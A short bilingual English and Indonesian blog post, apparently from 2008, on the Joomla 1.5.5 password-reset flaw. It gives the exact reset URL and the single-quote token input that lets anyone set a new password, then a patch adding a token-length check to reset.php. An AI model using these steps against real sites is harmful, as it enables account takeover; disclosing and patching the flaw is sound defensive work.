ENGLISH :
REMOTE RESET PASSWORD FOR JOOMLA 1.5.5 OR LOWER :
1. type on address bar :
http://yourdomain.com/index.php?option=com_user&view=reset&layout=confirm
2. fill ' char on token field
3. fill your new password.
SOLUTION FOR THIS :
1. upgrade your Joomla version, or
2. edit /components/com_user/models/reset.php :
after global $mainframe; in line 113 add :
if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
BAHASA INDONESIA :
MELAKUKAN REMOTE RESET PASSWORD JOOMLA :
1. ketik di address bar :
http://domainlo.com/index.php?option=com_user&view=reset&layout=confirm
2. pada field token isi karakter ' (tanda kutip)
3. masukkan password baru anda.
JOOMLA TELAH MEMPUNYAI SOLUSI UNTUK INI, YAITU :
1. upgrade Joomla anda, atau
2. edit /components/com_user/models/reset.php :
setelah global $mainframe; pada baris 113 sisipkan:
if(strlen($token) != 32) {
$this->setError(JText::_('INVALID_TOKEN'));
return false;
}
Thursday, October 16, 2008
Reset Password Vulnerable
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment